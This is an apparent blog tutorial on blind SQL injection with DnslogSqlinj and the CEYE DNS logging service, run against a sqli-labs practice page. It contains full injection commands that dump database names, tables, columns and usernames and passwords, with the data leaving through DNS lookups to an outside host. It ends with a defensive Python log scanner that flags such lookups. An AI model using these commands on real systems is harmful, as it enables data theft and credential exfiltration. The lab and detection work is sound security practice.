#Tools and environment setup
Tool download
https://github.com/ADOOO/DnslogSqlinj
CEYE - Monitor service for security testing (dns domain name interface)
Use Kali
Python 2.7 environment
Note: if the termcolor installation fails, see the article "pip installation termcolor failure solution" on B1aK2's CSDN blog.
Enter directly in the Kali terminal:
pip2 install gevent==1.2.2
pip2 install termcolor
This installs both dependencies.
#Using CEYE + DnslogSqlinj
First register an account on CEYE
Click on the upper right corner to open the main interface
It shows the Identifier and API Token, which we will need later
Open Kali and enter the DnslogSqlinj-master directory
Edit the config.py file
Enter the CEYE information from the previous step into it
Identifier corresponds to Dnsurl
API Token corresponds to apitoken
#Automation statement structure
#Demo case
1. First open the program
Command: sudo python dnslogSql.py
2. Get all databases
Payload:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs
Injection statement:
?id=1' and ({}) --+ --dbs
?id=1' --+ : first determine how the parameter is closed; here it is closed with a single quote ('). The tool does not automatically detect injection points for you, so you need to find the injection point and determine its closing method first.
and ({}) : ({}) is the placeholder where the injected statement is placed
--dbs : enumerate all database names
When we press Enter, the tool sends the ({}) injection statement to the target website at http://192.168.222.142
Get data count: There are currently 9 databases
The above is all the databases of the target website
3. Get all the table names of the specified database (specify to view the security database)
Payload:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables
After pressing Enter, the tool returns all the table names of the specified database
A total of 4 tables are shown
4. Get the column name (view all field information (columns) of the specified data table "users")
Payload:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns
At this point, all the field information of the users data table will come out.
5. Dump the data (view all information of username and password)
Payload:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" -C "username,password" --dump
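Seen from the defender's side, each step above returns its results through DNS lookups recorded under the tester's CEYE Identifier, so a database server resolving such names is the signal to look for. The following is an added example, not code from the original post or from DnslogSqlinj: a check over DNS resolver logs in which the log format, the IP addresses, the Identifier abc123 and the suffix list are all constructed assumptions.

```python
import re
from collections import defaultdict

# Assumption: suffixes of out-of-band DNS logging services to watch for.
# ceye.io is the CEYE service used on this page; extend for your environment.
OOB_SUFFIXES = ("ceye.io",)

# Assumption: constructed log format "<timestamp> <client-ip> <qtype> <qname>".
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

# Constructed sample resolver log; abc123 is a made-up CEYE Identifier.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A www.example.com
2024-05-01T10:00:02Z 10.0.0.20 A security.abc123.ceye.io
2024-05-01T10:00:03Z 10.0.0.20 A users.abc123.ceye.io
2024-05-01T10:00:04Z 10.0.0.5 A ceye.io.example.org
2024-05-01T10:00:05Z 10.0.0.20 A emails.ABC123.CEYE.IO.
malformed line
"""

def oob_suffix(qname):
    """Return the watched suffix that qname falls under, or None."""
    name = qname.rstrip(".").lower()
    for suffix in OOB_SUFFIXES:
        if name == suffix or name.endswith("." + suffix):
            return suffix
    return None

def find_oob_lookups(log_text, db_hosts):
    """Group lookups of watched domains by client and mark database hosts."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, client, _qtype, qname = m.groups()
        suffix = oob_suffix(qname)
        if suffix is None:
            continue
        name = qname.rstrip(".").lower()
        # Labels left of the suffix: the identifier plus whatever was prepended
        prefix = name[: -len(suffix)].rstrip(".")
        labels = prefix.split(".") if prefix else []
        hits[client].append({"time": ts, "qname": name, "labels": labels})
    return {c: {"is_db_host": c in db_hosts, "lookups": v} for c, v in hits.items()}

if __name__ == "__main__":
    for client, info in find_oob_lookups(SAMPLE_LOG, {"10.0.0.20"}).items():
        print(client, info["is_db_host"], [l["qname"] for l in info["lookups"]])
```

A database host that appears in the result with is_db_host set is worth investigating together with the web server's access log for the same time window.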